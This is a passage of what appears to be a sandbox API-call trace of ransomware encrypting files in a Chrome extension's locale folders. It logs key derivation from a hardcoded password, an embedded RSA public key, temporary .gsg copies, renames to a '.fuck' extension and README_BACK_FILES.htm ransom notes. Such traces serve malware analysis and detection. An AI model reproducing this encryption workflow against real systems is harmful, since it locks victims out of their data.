pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.978] CryptEncrypt (in: hKey=0x29378f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d9a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d9a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.979] WriteFile (in: hFile=0x5d58, lpBuffer=0x293d9a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d9a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.980] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0248.981] CryptEncrypt (in: hKey=0x2937438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.981] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.981] CloseHandle (hObject=0x5d5c) returned 1 [0248.981] CloseHandle (hObject=0x5d58) returned 1 [0248.981] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0248.985] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0248.985] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0248.987] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0248.988] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.988] CryptDestroyKey (hKey=0x2937438) returned 1 [0248.988] CryptReleaseContext (hProv=0x293d018, dwFlags=0x0) returned 1 [0248.988] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.988] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.988] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0248.988] AreFileApisANSI () returned 1 [0248.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.988] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.989] GetFileType (hFile=0x5d54) returned 0x1 [0248.989] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.990] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.990] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.991] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.991] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.991] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.991] GetLastError () returned 0x0 [0248.991] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json")) returned 0x20 [0248.993] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0248.993] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.994] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.994] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.995] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293dde8) returned 1 [0248.997] CryptCreateHash (in: hProv=0x293dde8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.997] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.997] CryptHashData (hHash=0x2938978, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.997] CryptDeriveKey (in: hProv=0x293dde8, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937438) returned 1 [0248.997] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.997] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.997] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293de70) returned 1 [0248.998] CryptImportPublicKeyInfo (in: hCryptProv=0x293de70, dwCertEncodingType=0x1, pInfo=0x29307e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930810*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930818*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29373f8) returned 1 [0248.998] CryptEncrypt (in: hKey=0x29373f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.998] CryptEncrypt (in: hKey=0x29373f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d018*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d018*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.998] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293d018*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d018*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.999] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd8, lpOverlapped=0x0) returned 1 [0249.001] CryptEncrypt (in: hKey=0x2937438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.001] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.001] CloseHandle (hObject=0x5d58) returned 1 [0249.001] CloseHandle (hObject=0x5d5c) returned 1 [0249.001] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0249.005] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0249.005] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.gsg")) returned 1 [0249.007] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.fuck")) returned 1 [0249.008] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.008] CryptDestroyKey (hKey=0x2937438) returned 1 [0249.008] CryptReleaseContext (hProv=0x293dde8, dwFlags=0x0) returned 1 [0249.008] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.008] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.008] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0249.008] AreFileApisANSI () returned 1 [0249.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.008] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.009] GetFileType (hFile=0x5d54) returned 0x1 [0249.009] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.010] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.010] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.011] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.011] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.011] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.011] GetLastError () returned 0x0 [0249.011] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json")) returned 0x20 [0249.011] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0249.011] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.012] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.013] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.028] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d348) returned 1 [0249.030] CryptCreateHash (in: hProv=0x293d348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.030] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.030] CryptHashData (hHash=0x2938978, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.030] CryptDeriveKey (in: hProv=0x293d348, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937438) returned 1 [0249.030] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.030] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.030] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293d0a0) returned 1 [0249.031] CryptImportPublicKeyInfo (in: hCryptProv=0x293d0a0, dwCertEncodingType=0x1, pInfo=0x2930f30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930f60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930f68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29379f8) returned 1 [0249.031] CryptEncrypt (in: hKey=0x29379f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.031] CryptEncrypt (in: hKey=0x29379f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d128*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d128*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.031] WriteFile (in: hFile=0x5d58, lpBuffer=0x293d128*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d128*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.032] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd9, lpOverlapped=0x0) returned 1 [0249.033] CryptEncrypt (in: hKey=0x2937438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.033] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.034] CloseHandle (hObject=0x5d5c) returned 1 [0249.034] CloseHandle (hObject=0x5d58) returned 1 [0249.034] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0249.037] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0249.038] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.gsg")) returned 1 [0249.039] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.fuck")) returned 1 [0249.041] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.041] CryptDestroyKey (hKey=0x2937438) returned 1 [0249.041] CryptReleaseContext (hProv=0x293d348, dwFlags=0x0) returned 1 [0249.041] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.041] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.041] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff 